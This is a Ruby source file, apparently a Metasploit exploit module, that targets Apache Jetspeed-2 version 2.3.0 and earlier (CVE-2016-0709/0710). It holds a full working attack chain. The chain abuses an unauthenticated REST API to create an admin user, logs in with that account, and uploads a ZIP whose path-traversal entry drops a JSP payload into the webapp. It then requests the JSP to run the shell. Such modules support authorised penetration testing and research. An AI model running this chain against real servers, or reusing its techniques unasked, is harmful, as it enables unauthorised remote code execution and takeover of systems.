Path: blob/master/modules/exploits/multi/http/apache_jetspeed_file_upload.rb
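##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Jetspeed Arbitrary File Upload',
        'Description' => %q{
          This module exploits the unsecured User Manager REST API and a ZIP file
          path traversal in Apache Jetspeed-2, version 2.3.0 and unknown earlier
          versions, to upload and execute a shell.

          Note: this exploit will create, use, and then delete a new admin user.

          Warning: in testing, exploiting the file upload clobbered the web
          interface beyond repair. No workaround has been found yet. Use this
          module at your own risk. No check will be implemented.
        },
        'Author' => [
          'Andreas Lindh', # Vulnerability discovery
          'wvu' # Metasploit module
        ],
        'References' => [
          ['CVE', '2016-0710'],
          ['CVE', '2016-0709'],
          ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'],
          ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'],
          ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710']
        ],
        'DisclosureDate' => '2016-03-06',
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'win'],
        'Arch' => ARCH_JAVA,
        'Privileged' => false,
        'Targets' => [
          ['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'],
          ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win']
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      Opt::RPORT(8080)
    ])
  end

  # Prefix every status line with the target host:port.
  def print_status(msg = '')
    super("#{peer} - #{msg}")
  end

  # Prefix every warning line with the target host:port.
  def print_warning(msg = '')
    super("#{peer} - #{msg}")
  end

  # Exploit chain: unauthenticated admin creation -> form login ->
  # ZIP upload with a traversing entry name -> GET the dropped JSP.
  # Each step aborts with fail_with when the target does not answer or
  # does not look like an unsecured Jetspeed, instead of raising
  # NoMethodError on a nil response further down the chain.
  def exploit
    print_warning('Exploitation has been observed to break the web interface; see the module description')

    # The generated credentials are printed so an operator can remove the
    # account by hand if cleanup never runs (e.g. the session is lost).
    print_status("Creating admin user: #{username}:#{password}")
    create_admin_user
    print_status('Logging in as newly created admin')
    jetspeed_login
    print_status("Uploading payload ZIP: #{zip_filename}")
    upload_payload_zip
    print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
    exec_jsp_shell
  end

  # Always runs after exploit, including after a fail_with: remove the
  # admin user we created, then let FileDropper remove the registered
  # files/directories through the session (if any).
  def cleanup
    print_status("Deleting user: #{username}")
    delete_user
    super
  end

  #
  # Exploit methods
  #

  # Create the user and grant it the admin role through the User Manager
  # REST API. Neither request carries a cookie: the API is reachable
  # without authentication on vulnerable versions.
  def create_admin_user
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => '/jetspeed/services/usermanager/users',
      'vars_post' => {
        'name' => username,
        'password' => password,
        'password_confirm' => password
      }
    )
    ensure_usermanager_response(res, 'create the user')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => "/jetspeed/services/usermanager/users/#{username}",
      'vars_post' => {
        'user_enabled' => 'true',
        'roles' => 'admin'
      }
    )
    ensure_usermanager_response(res, 'grant the admin role')
  end

  # Abort when an unauthenticated User Manager call did not go through.
  #
  # @param res  [Rex::Proto::Http::Response, nil] response, nil on connection failure
  # @param step [String] what the request was trying to do, for the message
  # @raise [Msf::Exploit::Failed] via fail_with
  def ensure_usermanager_response(res, step)
    fail_with(Failure::Unreachable, "No response while trying to #{step}") unless res

    # An auth challenge means the REST API is not "unsecured" on this host,
    # so the rest of the chain (which relies on the new admin) cannot work.
    return unless [401, 403].include?(res.code)

    fail_with(Failure::NotVulnerable,
              "User Manager REST API requires authentication (HTTP #{res.code}); cannot #{step}")
  end

  # Log in through the container's form login (j_security_check) and keep
  # the resulting cookies in @cookie for the admin-only requests that follow.
  def jetspeed_login
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/jetspeed/login/redirector'
    )
    fail_with(Failure::Unreachable, 'No response from the login redirector') unless res

    # send_request_cgi! follows redirects; the cookies of the final response
    # are what the original module used as the authenticated session.
    res = send_request_cgi!(
      'method' => 'POST',
      'uri' => '/jetspeed/login/j_security_check',
      'cookie' => res.get_cookies,
      'vars_post' => {
        'j_username' => username,
        'j_password' => password
      }
    )
    fail_with(Failure::Unreachable, 'No response from j_security_check') unless res

    @cookie = res.get_cookies
  end

  # Let's pretend we're mechanize: walk the admin site manager page to the
  # Import/Export portlet and return the action of its "Import File" form.
  # Fails with UnexpectedReply when either link/form cannot be found, which
  # is what a non-admin (or expired) session looks like from here.
  def import_file
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/jetspeed/portal/Administrative/site.psml',
      'cookie' => @cookie
    )
    fail_with(Failure::Unreachable, 'No response from the site manager page') unless res

    html = res.get_html_document
    import_export = html.at('//a[*//text() = "Import/Export"]/@href')
    unless import_export
      fail_with(Failure::UnexpectedReply, 'Could not find the Import/Export link; is the admin session valid?')
    end

    res = send_request_cgi!(
      'method' => 'POST',
      'uri' => import_export,
      'cookie' => @cookie
    )
    fail_with(Failure::Unreachable, 'No response from the Import/Export page') unless res

    html = res.get_html_document
    action = html.at('//form[*//text() = "Import File"]/@action')
    fail_with(Failure::UnexpectedReply, 'Could not find the Import File form action') unless action

    action
  end

  # Build a one-entry ZIP whose entry name climbs out of the importer's
  # extraction directory (zip-slip), wrap it in the multipart form the
  # Import/Export portlet expects, and POST it.
  def upload_payload_zip
    zip = Rex::Zip::Archive.new
    # Two "../" from the extraction directory to the webapp. The cleanup
    # paths below use one "../", presumably because the session's working
    # directory is one level above webapps/ -- verify on a live target.
    zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded)

    mime = Rex::MIME::Message.new
    mime.add_part(zip.pack, 'application/zip', 'binary',
                  %Q{form-data; name="fileInput"; filename="#{zip_filename}"})
    mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"')
    mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"')

    # Registered before the upload on purpose: a request that times out
    # after the ZIP was sent may still have deployed the JSP.
    case target['Platform']
    when 'linux'
      register_file_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
      register_dir_for_cleanup("../temp/#{username}")
    when 'win'
      register_file_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
      register_dir_for_cleanup("..\\temp\\#{username}")
    end

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => import_file,
      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
      'cookie' => @cookie,
      'data' => mime.to_s
    )
    fail_with(Failure::Unreachable, 'No response to the ZIP upload') unless res
  end

  # Request the dropped JSP so the payload runs. The response is deliberately
  # not inspected: a payload that keeps the request open (e.g. a reverse
  # connection) can make this return nil without anything being wrong.
  def exec_jsp_shell
    send_request_cgi(
      'method' => 'GET',
      'uri' => "/jetspeed/#{jsp_filename}",
      'cookie' => @cookie
    )
  end

  #
  # Cleanup methods
  #

  # Best-effort removal of the admin user. Sent without a cookie, so it
  # relies on the same unauthenticated User Manager API as creation.
  def delete_user
    send_request_cgi(
      'method' => 'DELETE',
      'uri' => "/jetspeed/services/usermanager/users/#{username}"
    )
  end

  #
  # Utility methods
  #

  # Random lowercase username, memoized so every step refers to the same user.
  def username
    @username ||= Rex::Text.rand_text_alpha_lower(8)
  end

  # Random alphanumeric password, memoized for the same reason.
  def password
    @password ||= Rex::Text.rand_text_alphanumeric(8)
  end

  # Random name of the JSP dropped into the webapp.
  def jsp_filename
    @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
  end

  # Random name of the uploaded ZIP (only shown to the importer).
  def zip_filename
    @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
  end
end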